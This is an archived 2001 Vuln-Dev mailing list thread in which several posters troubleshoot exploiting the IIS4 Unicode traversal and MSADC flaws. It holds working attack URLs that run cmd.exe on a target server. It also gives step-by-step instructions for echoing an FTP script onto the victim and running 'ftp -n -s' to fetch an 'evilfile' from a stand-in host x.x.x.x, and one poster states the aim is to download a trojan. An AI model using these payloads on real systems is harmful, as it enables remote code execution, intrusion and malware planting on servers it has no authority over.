Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [unicode / iis4]

From: Ryan Yagatich <ryagatich () CSN1 COM>
Date: Tue, 9 Jan 2001 12:46:30 -0500
it doesn't matter where the system directory is, or the web directory. (the
whole point of /msdac)
let's assume the following:

z:\WINDOWS_NT  <--system root
u:\internet\web_root <--web root
since the msdac variant comes from program files\(i don't remember
exactly)\msdac you can still execute any commands you please no matter where
those directories are



ryan


-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Tim
H
Sent: Monday, January 08, 2001 11:00 AM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: [unicode / iis4]


Hi All,
A lot of these attacks assume that the web directory is on the same drive as
the system and that the system is in the winnt directory.  If neither if
these conditions are true, is this exploit still reasonable?

Thanks,
Tim

-----Original Message-----
From: white hat eagle [mailto:whitehateagle () USA NET]
Sent: Saturday, January 06, 2001 4:32 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: [unicode / iis4]


Hi folks,
in order to download a file by using mdac.pl or mdac2.pl or iis/unicode
exploit you should create a file, say, ftptmp.txt and you should issue
the following command
ftp -n -s:ftptmp.txt
where the -n switch will suppress the interactive logon mode and -s switch
will contain the commands and user credentials.
and the contents of the ftptmp.txt should be
open x.x.x.x [or the name of the ftp server]
user
anonymous
me () hacker com
bin
get evilfile
bye
to create this file you should use the "echo" command and redirect the
content to the file ftptmp.txt as follows
echo open x.x.x.x >ftptmp.txt && echo user >>ftptmp.txt.......
and so on.
good luck,
whe-

Mad Zigy <zigy () GLOBAL CO ZA> wrote:
Well i have been able to use msadc2.pl yet the
commands i give do not work. so i tried the other way
by doing
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test
.txt
and all it did was say: The parameter is incorrect.
so then i though maybe we cant have a > in the string
so i found the hex of it and tried
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+echo+test+%
3e+c:\test.txt
yet it still gave me the same: The parameter is
incorrect.
I have been able to make it ftp into my pc by
http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+ftp+hostname
but i cant make it login as i need to echo a script
which i can run http://hostname/scripts/..%c0%
af../winnt/system32/cmd.exe?/c+ftp+-
s:c:\ftp.txt+hostname so that it will login and
download the exe / trojan
Thankz zigy!



_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com
Previous By Date Next
Previous By Thread Next

Current thread: